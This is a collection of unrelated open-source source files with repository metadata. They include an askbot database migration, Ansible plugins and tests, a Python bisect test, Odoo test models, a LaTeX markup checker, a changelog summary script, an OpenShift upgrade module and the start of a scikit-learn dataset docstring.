'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'votes'", 'to': "orm['auth.User']"}),
'vote': ('django.db.models.fields.SmallIntegerField', [], {}),
'voted_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'about': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'avatar_type': ('django.db.models.fields.CharField', [], {'default': "'n'", 'max_length': '1'}),
'bronze': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'consecutive_days_visit_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'country': ('django_countries.fields.CountryField', [], {'max_length': '2', 'blank': 'True'}),
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'display_tag_filter_strategy': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'email_isvalid': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'email_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'email_tag_filter_strategy': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'gold': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'gravatar': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'has_custom_avatar': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ignored_tags': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'interesting_tags': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'new_response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'questions_per_page': ('django.db.models.fields.SmallIntegerField', [], {'default': '10'}),
'real_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'reputation': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'seen_response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'show_country': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'silver': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'w'", 'max_length': '2'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['askbot']
| gpl-3.0 |
gentledevil/ansible | lib/ansible/plugins/action/include_vars.py | 82 | 1853 | # (c) 2013-2014, Benno Joy <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from ansible.errors import AnsibleError
from ansible.parsing import DataLoader
from ansible.plugins.action import ActionBase
class ActionModule(ActionBase):
TRANSFERS_FILES = False
def run(self, tmp=None, task_vars=dict()):
source = self._task.args.get('_raw_params')
if self._task._role:
source = self._loader.path_dwim_relative(self._task._role._role_path, 'vars', source)
else:
source = self._loader.path_dwim_relative(self._loader.get_basedir(), 'vars', source)
if os.path.exists(source):
(data, show_content) = self._loader._get_file_contents(source)
data = self._loader.load(data, show_content)
if data is None:
data = {}
if not isinstance(data, dict):
raise AnsibleError("%s must be stored as a dictionary/hash" % source)
return dict(ansible_facts=data, _ansible_no_log=not show_content)
else:
return dict(failed=True, msg="Source file not found.", file=source)
| gpl-3.0 |
dga4654dan/UTM-Demo | V_1_0_2_1/UtmDemo_Sfs_2.9.0/UtmDemo_Sfs_2.9.0_Server/lib/Lib/test/test_bisect.py | 15 | 5533 | from test_support import TestFailed
import bisect
import sys
nerrors = 0
def check_bisect(func, list, elt, expected):
global nerrors
got = func(list, elt)
if got != expected:
print >> sys.stderr, \
"expected %s(%s, %s) -> %s, but got %s" % (func.__name__,
list,
elt,
expected,
got)
nerrors += 1
# XXX optional slice arguments need tests.
check_bisect(bisect.bisect_right, [], 1, 0)
check_bisect(bisect.bisect_right, [1], 0, 0)
check_bisect(bisect.bisect_right, [1], 1, 1)
check_bisect(bisect.bisect_right, [1], 2, 1)
check_bisect(bisect.bisect_right, [1, 1], 0, 0)
check_bisect(bisect.bisect_right, [1, 1], 1, 2)
check_bisect(bisect.bisect_right, [1, 1], 2, 2)
check_bisect(bisect.bisect_right, [1, 1, 1], 0, 0)
check_bisect(bisect.bisect_right, [1, 1, 1], 1, 3)
check_bisect(bisect.bisect_right, [1, 1, 1], 2, 3)
check_bisect(bisect.bisect_right, [1, 1, 1, 1], 0, 0)
check_bisect(bisect.bisect_right, [1, 1, 1, 1], 1, 4)
check_bisect(bisect.bisect_right, [1, 1, 1, 1], 2, 4)
check_bisect(bisect.bisect_right, [1, 2], 0, 0)
check_bisect(bisect.bisect_right, [1, 2], 1, 1)
check_bisect(bisect.bisect_right, [1, 2], 1.5, 1)
check_bisect(bisect.bisect_right, [1, 2], 2, 2)
check_bisect(bisect.bisect_right, [1, 2], 3, 2)
check_bisect(bisect.bisect_right, [1, 1, 2, 2], 0, 0)
check_bisect(bisect.bisect_right, [1, 1, 2, 2], 1, 2)
check_bisect(bisect.bisect_right, [1, 1, 2, 2], 1.5, 2)
check_bisect(bisect.bisect_right, [1, 1, 2, 2], 2, 4)
check_bisect(bisect.bisect_right, [1, 1, 2, 2], 3, 4)
check_bisect(bisect.bisect_right, [1, 2, 3], 0, 0)
check_bisect(bisect.bisect_right, [1, 2, 3], 1, 1)
check_bisect(bisect.bisect_right, [1, 2, 3], 1.5, 1)
check_bisect(bisect.bisect_right, [1, 2, 3], 2, 2)
check_bisect(bisect.bisect_right, [1, 2, 3], 2.5, 2)
check_bisect(bisect.bisect_right, [1, 2, 3], 3, 3)
check_bisect(bisect.bisect_right, [1, 2, 3], 4, 3)
check_bisect(bisect.bisect_right, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 0, 0)
check_bisect(bisect.bisect_right, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 1, 1)
check_bisect(bisect.bisect_right, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 1.5, 1)
check_bisect(bisect.bisect_right, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 2, 3)
check_bisect(bisect.bisect_right, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 2.5, 3)
check_bisect(bisect.bisect_right, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 3, 6)
check_bisect(bisect.bisect_right, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 3.5, 6)
check_bisect(bisect.bisect_right, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 4, 10)
check_bisect(bisect.bisect_right, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 5, 10)
check_bisect(bisect.bisect_left, [], 1, 0)
check_bisect(bisect.bisect_left, [1], 0, 0)
check_bisect(bisect.bisect_left, [1], 1, 0)
check_bisect(bisect.bisect_left, [1], 2, 1)
check_bisect(bisect.bisect_left, [1, 1], 0, 0)
check_bisect(bisect.bisect_left, [1, 1], 1, 0)
check_bisect(bisect.bisect_left, [1, 1], 2, 2)
check_bisect(bisect.bisect_left, [1, 1, 1], 0, 0)
check_bisect(bisect.bisect_left, [1, 1, 1], 1, 0)
check_bisect(bisect.bisect_left, [1, 1, 1], 2, 3)
check_bisect(bisect.bisect_left, [1, 1, 1, 1], 0, 0)
check_bisect(bisect.bisect_left, [1, 1, 1, 1], 1, 0)
check_bisect(bisect.bisect_left, [1, 1, 1, 1], 2, 4)
check_bisect(bisect.bisect_left, [1, 2], 0, 0)
check_bisect(bisect.bisect_left, [1, 2], 1, 0)
check_bisect(bisect.bisect_left, [1, 2], 1.5, 1)
check_bisect(bisect.bisect_left, [1, 2], 2, 1)
check_bisect(bisect.bisect_left, [1, 2], 3, 2)
check_bisect(bisect.bisect_left, [1, 1, 2, 2], 0, 0)
check_bisect(bisect.bisect_left, [1, 1, 2, 2], 1, 0)
check_bisect(bisect.bisect_left, [1, 1, 2, 2], 1.5, 2)
check_bisect(bisect.bisect_left, [1, 1, 2, 2], 2, 2)
check_bisect(bisect.bisect_left, [1, 1, 2, 2], 3, 4)
check_bisect(bisect.bisect_left, [1, 2, 3], 0, 0)
check_bisect(bisect.bisect_left, [1, 2, 3], 1, 0)
check_bisect(bisect.bisect_left, [1, 2, 3], 1.5, 1)
check_bisect(bisect.bisect_left, [1, 2, 3], 2, 1)
check_bisect(bisect.bisect_left, [1, 2, 3], 2.5, 2)
check_bisect(bisect.bisect_left, [1, 2, 3], 3, 2)
check_bisect(bisect.bisect_left, [1, 2, 3], 4, 3)
check_bisect(bisect.bisect_left, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 0, 0)
check_bisect(bisect.bisect_left, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 1, 0)
check_bisect(bisect.bisect_left, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 1.5, 1)
check_bisect(bisect.bisect_left, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 2, 1)
check_bisect(bisect.bisect_left, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 2.5, 3)
check_bisect(bisect.bisect_left, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 3, 3)
check_bisect(bisect.bisect_left, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 3.5, 6)
check_bisect(bisect.bisect_left, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 4, 6)
check_bisect(bisect.bisect_left, [1, 2, 2, 3, 3, 3, 4, 4, 4, 4], 5, 10)
def check_insort(n):
global nerrors
from random import choice
import sys
digits = "0123456789"
raw = []
insorted = []
for i in range(n):
digit = choice(digits)
raw.append(digit)
if digit in "02468":
f = bisect.insort_left
else:
f = bisect.insort_right
f(insorted, digit)
sorted = raw[:]
sorted.sort()
if sorted == insorted:
return
print >> sys.stderr, "insort test failed: raw %s got %s" % (raw, insorted)
nerrors += 1
check_insort(500)
if nerrors:
raise TestFailed("%d errors in test_bisect" % nerrors)
| gpl-2.0 |
hogarthj/ansible | test/units/parsing/utils/test_yaml.py | 159 | 1176 | # -*- coding: utf-8 -*-
# (c) 2017, Ansible Project
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import pytest
from ansible.errors import AnsibleParserError
from ansible.parsing.utils.yaml import from_yaml
def test_from_yaml_simple():
assert from_yaml(u'---\n- test: 1\n test2: "2"\n- caf\xe9: "caf\xe9"') == [{u'test': 1, u'test2': u"2"}, {u"caf\xe9": u"caf\xe9"}]
def test_bad_yaml():
with pytest.raises(AnsibleParserError):
from_yaml(u'foo: bar: baz')
| gpl-3.0 |
bala4901/odoo | addons/website/models/test_models.py | 56 | 1285 | # -*- coding: utf-8 -*-
from openerp.osv import orm, fields
class test_converter(orm.Model):
_name = 'website.converter.test'
_columns = {
'char': fields.char(),
'integer': fields.integer(),
'float': fields.float(),
'numeric': fields.float(digits=(16, 2)),
'many2one': fields.many2one('website.converter.test.sub'),
'binary': fields.binary(),
'date': fields.date(),
'datetime': fields.datetime(),
'selection': fields.selection([
(1, "rΓ©ponse A"),
(2, "rΓ©ponse B"),
(3, "rΓ©ponse C"),
(4, "rΓ©ponse D"),
]),
'selection_str': fields.selection([
('A', "Qu'il n'est pas arrivΓ© Γ Toronto"),
('B', "Qu'il Γ©tait supposΓ© arriver Γ Toronto"),
('C', "Qu'est-ce qu'il fout ce maudit pancake, tabernacle ?"),
('D', "La rΓ©ponse D"),
], string=u"Lorsqu'un pancake prend l'avion Γ destination de Toronto et "
u"qu'il fait une escale technique Γ St Claude, on dit:"),
'html': fields.html(),
'text': fields.text(),
}
class test_converter_sub(orm.Model):
_name = 'website.converter.test.sub'
_columns = {
'name': fields.char(),
}
| agpl-3.0 |
2uller/LotF | App/Tools/Scripts/texcheck.py | 12 | 9489 | """ TeXcheck.py -- rough syntax checking on Python style LaTeX documents.
Written by Raymond D. Hettinger <python at rcn.com>
Copyright (c) 2003 Python Software Foundation. All rights reserved.
Designed to catch common markup errors including:
* Unbalanced or mismatched parenthesis, brackets, and braces.
* Unbalanced or mismatched \\begin and \\end blocks.
* Misspelled or invalid LaTeX commands.
* Use of forward slashes instead of backslashes for commands.
* Table line size mismatches.
Sample command line usage:
python texcheck.py -k chapterheading -m lib/librandomtex *.tex
Options:
-m Munge parenthesis and brackets. [0,n) would normally mismatch.
-k keyword: Keyword is a valid LaTeX command. Do not include the backslash.
-d: Delimiter check only (useful for non-LaTeX files).
-h: Help
-s lineno: Start at lineno (useful for skipping complex sections).
-v: Verbose. Trace the matching of //begin and //end blocks.
"""
import re
import sys
import getopt
from itertools import izip, count, islice
import glob
cmdstr = r"""
\section \module \declaremodule \modulesynopsis \moduleauthor
\sectionauthor \versionadded \code \class \method \begin
\optional \var \ref \end \subsection \lineiii \hline \label
\indexii \textrm \ldots \keyword \stindex \index \item \note
\withsubitem \ttindex \footnote \citetitle \samp \opindex
\noindent \exception \strong \dfn \ctype \obindex \character
\indexiii \function \bifuncindex \refmodule \refbimodindex
\subsubsection \nodename \member \chapter \emph \ASCII \UNIX
\regexp \program \production \token \productioncont \term
\grammartoken \lineii \seemodule \file \EOF \documentclass
\usepackage \title \input \maketitle \ifhtml \fi \url \Cpp
\tableofcontents \kbd \programopt \envvar \refstmodindex
\cfunction \constant \NULL \moreargs \cfuncline \cdata
\textasciicircum \n \ABC \setindexsubitem \versionchanged
\deprecated \seetext \newcommand \POSIX \pep \warning \rfc
\verbatiminput \methodline \textgreater \seetitle \lineiv
\funclineni \ulink \manpage \funcline \dataline \unspecified
\textbackslash \mimetype \mailheader \seepep \textunderscore
\longprogramopt \infinity \plusminus \shortversion \version
\refmodindex \seerfc \makeindex \makemodindex \renewcommand
\indexname \appendix \protect \indexiv \mbox \textasciitilde
\platform \seeurl \leftmargin \labelwidth \localmoduletable
\LaTeX \copyright \memberline \backslash \pi \centerline
\caption \vspace \textwidth \menuselection \textless
\makevar \csimplemacro \menuselection \bfcode \sub \release
\email \kwindex \refexmodindex \filenq \e \menuselection
\exindex \linev \newsgroup \verbatim \setshortversion
\author \authoraddress \paragraph \subparagraph \cmemberline
\textbar \C \seelink
"""
def matchclose(c_lineno, c_symbol, openers, pairmap):
"Verify that closing delimiter matches most recent opening delimiter"
try:
o_lineno, o_symbol = openers.pop()
except IndexError:
print "\nDelimiter mismatch. On line %d, encountered closing '%s' without corresponding open" % (c_lineno, c_symbol)
return
if o_symbol in pairmap.get(c_symbol, [c_symbol]): return
print "\nOpener '%s' on line %d was not closed before encountering '%s' on line %d" % (o_symbol, o_lineno, c_symbol, c_lineno)
return
def checkit(source, opts, morecmds=[]):
"""Check the LaTeX formatting in a sequence of lines.
Opts is a mapping of options to option values if any:
-m munge parenthesis and brackets
-d delimiters only checking
-v verbose trace of delimiter matching
-s lineno: linenumber to start scan (default is 1).
Morecmds is a sequence of LaTeX commands (without backslashes) that
are to be considered valid in the scan.
"""
texcmd = re.compile(r'\\[A-Za-z]+')
falsetexcmd = re.compile(r'\/([A-Za-z]+)') # Mismarked with forward slash
validcmds = set(cmdstr.split())
for cmd in morecmds:
validcmds.add('\\' + cmd)
if '-m' in opts:
pairmap = {']':'[(', ')':'(['} # Munged openers
else:
pairmap = {']':'[', ')':'('} # Normal opener for a given closer
openpunct = set('([') # Set of valid openers
delimiters = re.compile(r'\\(begin|end){([_a-zA-Z]+)}|([()\[\]])')
braces = re.compile(r'({)|(})')
doubledwords = re.compile(r'(\b[A-za-z]+\b) \b\1\b')
spacingmarkup = re.compile(r'\\(ABC|ASCII|C|Cpp|EOF|infinity|NULL|plusminus|POSIX|UNIX)\s')
openers = [] # Stack of pending open delimiters
bracestack = [] # Stack of pending open braces
tablestart = re.compile(r'\\begin{(?:long)?table([iv]+)}')
tableline = re.compile(r'\\line([iv]+){')
tableend = re.compile(r'\\end{(?:long)?table([iv]+)}')
tablelevel = ''
tablestartline = 0
startline = int(opts.get('-s', '1'))
lineno = 0
for lineno, line in izip(count(startline), islice(source, startline-1, None)):
line = line.rstrip()
# Check balancing of open/close parenthesis, brackets, and begin/end blocks
for begend, name, punct in delimiters.findall(line):
if '-v' in opts:
print lineno, '|', begend, name, punct,
if begend == 'begin' and '-d' not in opts:
openers.append((lineno, name))
elif punct in openpunct:
openers.append((lineno, punct))
elif begend == 'end' and '-d' not in opts:
matchclose(lineno, name, openers, pairmap)
elif punct in pairmap:
matchclose(lineno, punct, openers, pairmap)
if '-v' in opts:
print ' --> ', openers
# Balance opening and closing braces
for open, close in braces.findall(line):
if open == '{':
bracestack.append(lineno)
if close == '}':
try:
bracestack.pop()
except IndexError:
print r'Warning, unmatched } on line %s.' % (lineno,)
# Optionally, skip LaTeX specific checks
if '-d' in opts:
continue
# Warn whenever forward slashes encountered with a LaTeX command
for cmd in falsetexcmd.findall(line):
if '822' in line or '.html' in line:
continue # Ignore false positives for urls and for /rfc822
if '\\' + cmd in validcmds:
print 'Warning, forward slash used on line %d with cmd: /%s' % (lineno, cmd)
# Check for markup requiring {} for correct spacing
for cmd in spacingmarkup.findall(line):
print r'Warning, \%s should be written as \%s{} on line %d' % (cmd, cmd, lineno)
# Validate commands
nc = line.find(r'\newcommand')
if nc != -1:
start = line.find('{', nc)
end = line.find('}', start)
validcmds.add(line[start+1:end])
for cmd in texcmd.findall(line):
if cmd not in validcmds:
print r'Warning, unknown tex cmd on line %d: \%s' % (lineno, cmd)
# Check table levels (make sure lineii only inside tableii)
m = tablestart.search(line)
if m:
tablelevel = m.group(1)
tablestartline = lineno
m = tableline.search(line)
if m and m.group(1) != tablelevel:
print r'Warning, \line%s on line %d does not match \table%s on line %d' % (m.group(1), lineno, tablelevel, tablestartline)
if tableend.search(line):
tablelevel = ''
# Style guide warnings
if 'e.g.' in line or 'i.e.' in line:
print r'Style warning, avoid use of i.e or e.g. on line %d' % (lineno,)
for dw in doubledwords.findall(line):
print r'Doubled word warning. "%s" on line %d' % (dw, lineno)
lastline = lineno
for lineno, symbol in openers:
print "Unmatched open delimiter '%s' on line %d" % (symbol, lineno)
for lineno in bracestack:
print "Unmatched { on line %d" % (lineno,)
print 'Done checking %d lines.' % (lastline,)
return 0
def main(args=None):
if args is None:
args = sys.argv[1:]
optitems, arglist = getopt.getopt(args, "k:mdhs:v")
opts = dict(optitems)
if '-h' in opts or args==[]:
print __doc__
return 0
if len(arglist) < 1:
print 'Please specify a file to be checked'
return 1
for i, filespec in enumerate(arglist):
if '*' in filespec or '?' in filespec:
arglist[i:i+1] = glob.glob(filespec)
morecmds = [v for k,v in optitems if k=='-k']
err = []
for filename in arglist:
print '=' * 30
print "Checking", filename
try:
f = open(filename)
except IOError:
print 'Cannot open file %s.' % arglist[0]
return 2
try:
err.append(checkit(f, opts, morecmds))
finally:
f.close()
return max(err)
if __name__ == '__main__':
sys.exit(main())
| gpl-2.0 |
xor10/adsbypasser | deploy/mirrors/summary.py | 5 | 4293 | import re
import sys
from markdown.blockprocessors import BlockProcessor
from markdown.preprocessors import Preprocessor
from markdown.preprocessors import ReferencePreprocessor
from markdown.extensions import Extension
from markdown import markdown
from util import to_abs_path
_CHANGELOG_PATH = to_abs_path('../../CHANGELOG.md')
_SITES_PATH = to_abs_path('../../SITES.md')
_TEMPLATE_PATH = to_abs_path('./summary.template.md')
_MESSAGE = {
'both': '''**Lite edition** removes image-hosting site support from **Full edition**.
If you prefer to use other userscripts to deal with image-hosting sites, you can use the Lite edition.
''',
'full': 'If you do not need image-hosting site support, please see [Lite edition]({url}).',
'lite': 'Lite edition does not support image-hosting sites. If you want full-featured edition, please see [here]({url}).',
}
class _ChangeLogProcessor(BlockProcessor):
def __init__(self, parser, pack):
BlockProcessor.__init__(self, parser)
self._pack = pack
self._first = True
def test(self, parent, block):
return self._first
def run(self, parent, blocks):
h = blocks[0]
b = blocks[1]
self._pack.setChangeLog(h, b)
self._first = False
class _ChangeLogExtension(Extension):
def __init__(self, pack):
super(_ChangeLogExtension, self).__init__()
self._pack = pack
def extendMarkdown(self, md, md_globals):
clp = _ChangeLogProcessor(md.parser, self._pack)
md.parser.blockprocessors.add('changelog', clp, '>empty')
class _SitesProcessor(BlockProcessor):
def __init__(self, parser, pack):
BlockProcessor.__init__(self, parser)
self._pack = pack
self._first = True
def test(self, parent, block):
return self._first
def run(self, parent, blocks):
a = blocks[0]
a = a.splitlines()
c = []
d = 0
for b in a:
if b == '* else':
pass
elif b[0] == '*':
c.append(b)
else:
d = d + 1
c = '\n'.join(c)
self._pack.setSites(c, d)
self._first = False
class _SitesExtension(Extension):
def __init__(self, pack):
super(_SitesExtension, self).__init__()
self._pack = pack
def extendMarkdown(self, md, md_globals):
ssp = _SitesProcessor(md.parser, self._pack)
md.parser.blockprocessors.add('sites', ssp, '>empty')
class _Pack(object):
def __init__(self, cl, ss, tpl):
self._cl_head = None
self._cl_body = None
self._ss_group = None
self._ss_count = None
self._tpl = tpl
cle = _ChangeLogExtension(self)
unused = markdown(cl, [cle])
sse = _SitesExtension(self)
unused = markdown(ss, [sse])
self._cl = '{0}\n\n{1}'.format(self._cl_head, self._cl_body)
def setChangeLog(self, head, body):
self._cl_head = head
self._cl_body = body
def setSites(self, group, count):
self._ss_group = group
self._ss_count = count
def getResult(self, edition, url):
args = {
'changelog': self._cl,
'sites': self._ss_group,
'count': self._ss_count,
'edition': _MESSAGE[edition].format(url=url),
}
summary = self._tpl.format(**args)
return summary
def make_summary():
fin = open(_CHANGELOG_PATH, 'r')
cl = fin.read()
fin.close()
fin = open(_SITES_PATH, 'r')
ss = fin.read()
fin.close()
fin = open(_TEMPLATE_PATH, 'r')
tpl = fin.read()
tpl = tpl.decode('utf-8')
fin.close()
pack = _Pack(cl, ss, tpl)
return pack
def main(args=None):
if args is None:
args = sys.argv
summary = make_summary()
result = summary.getResult('both', '')
summary_path = to_abs_path('../../dest/summary.md')
with open(summary_path, 'w') as fout:
fout.write(result.encode('utf-8'))
return 0
if __name__ == '__main__':
exit_code = main(sys.argv)
sys.exit(exit_code)
# ex: ts=4 sts=4 sw=4 et
# sublime: tab_size 4; translate_tabs_to_spaces true; detect_indentation false; use_tab_stops true;
# kate: space-indent on; indent-width 4;
| bsd-2-clause |
wbrefvem/openshift-ansible | playbooks/common/openshift-cluster/upgrades/library/openshift_upgrade_config.py | 35 | 5312 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""Ansible module for modifying OpenShift configs during an upgrade"""
import os
import yaml
DOCUMENTATION = '''
---
module: openshift_upgrade_config
short_description: OpenShift Upgrade Config
author: Jason DeTiberus
requirements: [ ]
'''
EXAMPLES = '''
'''
def modify_api_levels(level_list, remove, ensure, msg_prepend='',
msg_append=''):
""" modify_api_levels """
changed = False
changes = []
if not isinstance(remove, list):
remove = []
if not isinstance(ensure, list):
ensure = []
if not isinstance(level_list, list):
new_list = []
changed = True
changes.append("%s created missing %s" % (msg_prepend, msg_append))
else:
new_list = level_list
for level in remove:
if level in new_list:
new_list.remove(level)
changed = True
changes.append("%s removed %s %s" % (msg_prepend, level, msg_append))
for level in ensure:
if level not in new_list:
new_list.append(level)
changed = True
changes.append("%s added %s %s" % (msg_prepend, level, msg_append))
return {'new_list': new_list, 'changed': changed, 'changes': changes}
def upgrade_master_3_0_to_3_1(ansible_module, config_base, backup):
"""Main upgrade method for 3.0 to 3.1."""
changes = []
# Facts do not get transferred to the hosts where custom modules run,
# need to make some assumptions here.
master_config = os.path.join(config_base, 'master/master-config.yaml')
master_cfg_file = open(master_config, 'r')
config = yaml.safe_load(master_cfg_file.read())
master_cfg_file.close()
# Remove unsupported api versions and ensure supported api versions from
# master config
unsupported_levels = ['v1beta1', 'v1beta2', 'v1beta3']
supported_levels = ['v1']
result = modify_api_levels(config.get('apiLevels'), unsupported_levels,
supported_levels, 'master-config.yaml:', 'from apiLevels')
if result['changed']:
config['apiLevels'] = result['new_list']
changes.append(result['changes'])
if 'kubernetesMasterConfig' in config and 'apiLevels' in config['kubernetesMasterConfig']:
config['kubernetesMasterConfig'].pop('apiLevels')
changes.append('master-config.yaml: removed kubernetesMasterConfig.apiLevels')
# Add masterCA to serviceAccountConfig
if 'serviceAccountConfig' in config and 'masterCA' not in config['serviceAccountConfig']:
config['serviceAccountConfig']['masterCA'] = config['oauthConfig'].get('masterCA', 'ca.crt')
# Add proxyClientInfo to master-config
if 'proxyClientInfo' not in config['kubernetesMasterConfig']:
config['kubernetesMasterConfig']['proxyClientInfo'] = {
'certFile': 'master.proxy-client.crt',
'keyFile': 'master.proxy-client.key'
}
changes.append("master-config.yaml: added proxyClientInfo")
if len(changes) > 0:
if backup:
# TODO: Check success:
ansible_module.backup_local(master_config)
# Write the modified config:
out_file = open(master_config, 'w')
out_file.write(yaml.safe_dump(config, default_flow_style=False))
out_file.close()
return changes
def upgrade_master(ansible_module, config_base, from_version, to_version, backup):
"""Upgrade entry point."""
if from_version == '3.0':
if to_version == '3.1':
return upgrade_master_3_0_to_3_1(ansible_module, config_base, backup)
def main():
""" main """
# disabling pylint errors for global-variable-undefined and invalid-name
# for 'global module' usage, since it is required to use ansible_facts
# pylint: disable=global-variable-undefined, invalid-name,
# redefined-outer-name
global module
module = AnsibleModule( # noqa: F405
argument_spec=dict(
config_base=dict(required=True),
from_version=dict(required=True, choices=['3.0']),
to_version=dict(required=True, choices=['3.1']),
role=dict(required=True, choices=['master']),
backup=dict(required=False, default=True, type='bool')
),
supports_check_mode=True,
)
from_version = module.params['from_version']
to_version = module.params['to_version']
role = module.params['role']
backup = module.params['backup']
config_base = module.params['config_base']
try:
changes = []
if role == 'master':
changes = upgrade_master(module, config_base, from_version,
to_version, backup)
changed = len(changes) > 0
return module.exit_json(changed=changed, changes=changes)
# ignore broad-except error to avoid stack trace to ansible user
# pylint: disable=broad-except
except Exception as e:
return module.fail_json(msg=str(e))
# ignore pylint errors related to the module_utils import
# pylint: disable=redefined-builtin, unused-wildcard-import, wildcard-import, wrong-import-position
# import module snippets
from ansible.module_utils.basic import * # noqa: E402,F403
if __name__ == '__main__':
main()
| apache-2.0 |
etkirsch/scikit-learn | sklearn/datasets/species_distributions.py | 198 | 7923 | """
=============================
Species distribution dataset
=============================
This dataset represents the geographic distribution of species.
The dataset is provided by Phillips et. al. (2006).
The two species are:
- `"Bradypus variegatus"
<http://www.iucnredlist.org/apps/redlist/details/3038/0>`_ ,
the Brown-throated Sloth.
- `"Microryzomys minutus"
